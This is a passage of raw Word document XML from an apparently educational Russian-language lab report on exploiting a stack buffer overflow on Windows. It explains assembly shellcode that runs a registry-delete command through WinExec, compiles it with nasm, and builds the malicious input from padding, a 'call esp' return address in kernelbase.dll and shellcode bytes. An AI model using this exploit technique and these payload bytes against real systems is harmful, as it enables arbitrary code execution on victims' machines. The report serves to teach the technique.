      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>, что приводит к помещению адреса следующий инструкции (строки команды) в стек. Строка команды</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>REG</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TEST</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>’ ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>» - удаляет ключ «</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">в разделе реестра </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CURRENT</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>USER</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve">). 3) </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pop</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">извлекает адрес строки из стека в регистр </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Push</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">снова помещает адрес строки в стек. </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>, 0</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>75493</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BC</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve">0 </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">загружает в </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>адрес функции (</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Call</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ecx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">вызывает функцию для выполнения команды. </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mov</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>, 0</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t>7545</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve">390 – </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t xml:space="preserve">загружает в </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>другой адрес (</w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="000027CF">
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Call</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebx</w:t>
      </w:r>
      <w:r w:rsidR="000027CF" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="000027CF">
        <w:t>вызывает вторую функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4392C538" w14:textId="77777777" w:rsidR="00FD4B58" w:rsidRDefault="000027CF" w:rsidP="005E71E3">
      <w:pPr>
        <w:pStyle w:val="af3"/>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Затем, через командную строку при помощи утилиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nasm</w:t>
      </w:r>
      <w:r w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">файл </w:t>
      </w:r>
      <w:r w:rsidRPr="000027CF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r w:rsidRPr="000027CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">был преобразован в </w:t>
      </w:r>
      <w:r w:rsidRPr="000027CF">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="000027CF">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Полученный файл был открыт в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">редакторе </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HxD</w:t>
      </w:r>
      <w:r w:rsidR="00FD4B58">
        <w:t xml:space="preserve">, в результате был получен шелл-код в виде байтовый кода. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54899AE7" w14:textId="77777777" w:rsidR="00FD4B58" w:rsidRDefault="00FD4B58" w:rsidP="00FD4B58">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ADEBD46" wp14:editId="10E200F2">
            <wp:extent cx="4425950" cy="391553"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="3972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591" cy="39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6569" w14:textId="73890E21" w:rsidR="00FD4B58" w:rsidRDefault="00FD4B58" w:rsidP="00FD4B58">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FD4B58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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - компиляция бинарного файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D92EC93" w14:textId="77777777" w:rsidR="00FD4B58" w:rsidRDefault="00FD4B58" w:rsidP="00FD4B58"/>
    <w:p w14:paraId="461BB26D" w14:textId="77777777" w:rsidR="00FD4B58" w:rsidRDefault="00FD4B58" w:rsidP="00FD4B58">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00AE3BC6" wp14:editId="33DF3780">
            <wp:extent cx="5436954" cy="1079500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1874330299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0299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193" cy="10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C8E5" w14:textId="734667B8" w:rsidR="00FD4B58" w:rsidRPr="00FD4B58" w:rsidRDefault="00FD4B58" w:rsidP="00FD4B58">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00FD4B58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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - бинарный файл в </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD4B58">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-редакторе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E564E" w14:textId="3719ADD0" w:rsidR="00FD4B58" w:rsidRDefault="00FD4B58" w:rsidP="00FD4B58">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:left="709" w:firstLine="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Сборка</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>итоговой строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F4356B" w14:textId="17AAFAA2" w:rsidR="005573D7" w:rsidRPr="007C2C7E" w:rsidRDefault="005573D7" w:rsidP="005573D7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>strrepare</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>содержит структурированные компоненты для создания вредоносной строки</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB78812" w14:textId="77777777" w:rsidR="00950618" w:rsidRDefault="005573D7" w:rsidP="005573D7">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
      </w:pPr>
      <w:r>
        <w:t>Строка1</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E550BF7" w14:textId="03D762C7" w:rsidR="00950618" w:rsidRPr="005573D7" w:rsidRDefault="005573D7" w:rsidP="00D76A9C">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
      </w:pPr>
      <w:r w:rsidRPr="005573D7">
        <w:t>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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (заполнение буфера (12 байт символов «</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515169BC" w14:textId="77777777" w:rsidR="00950618" w:rsidRDefault="005573D7" w:rsidP="005573D7">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>трока2</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00950618">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDC6454" w14:textId="2FB8DD9F" w:rsidR="005573D7" w:rsidRDefault="005573D7" w:rsidP="00950618">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="1"/>
      </w:pPr>
      <w:r w:rsidRPr="005573D7">
        <w:t>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66\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>66 (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">дополнительные 4 байта для полного заполнения буфера </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve">12] </w:t>
      </w:r>
      <w:r>
        <w:t>(16 байт)</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25122F1C" w14:textId="77777777" w:rsidR="00950618" w:rsidRDefault="005573D7" w:rsidP="00950618">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="1"/>
      </w:pPr>
      <w:r>
        <w:t>Строка3</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06265265" w14:textId="21751E25" w:rsidR="005573D7" w:rsidRPr="007C2C7E" w:rsidRDefault="005573D7" w:rsidP="00950618">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="1"/>
      </w:pPr>
      <w:r w:rsidRPr="005573D7">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>49\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xAC</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>76 (</w:t>
      </w:r>
      <w:r>
        <w:t>адрес возврата (</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>7628</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AC</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>49)</w:t>
      </w:r>
      <w:r>
        <w:t>, перезаписывающий</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">указатель </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Адрес соответствует инструкции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">в модуле </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernelbase</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:t>, что позволяет перенаправить выполнение на шелл-коде</w:t>
      </w:r>
      <w:r w:rsidRPr="005573D7">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA22CC" w14:textId="386B4B84" w:rsidR="00950618" w:rsidRPr="00950618" w:rsidRDefault="005573D7" w:rsidP="00950618">
      <w:pPr>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Строка</w:t>
      </w:r>
      <w:r w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xEB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10\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B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53\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xB</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>9\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xC</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>0\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B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49\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>75\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xFF</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xD</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="007C2C7E">
        <w:t>1\</w:t>
      </w:r>
      <w:r w:rsidR="00950618" w:rsidRPr="00950618">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xBB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90\</w:t>
      </w:r>
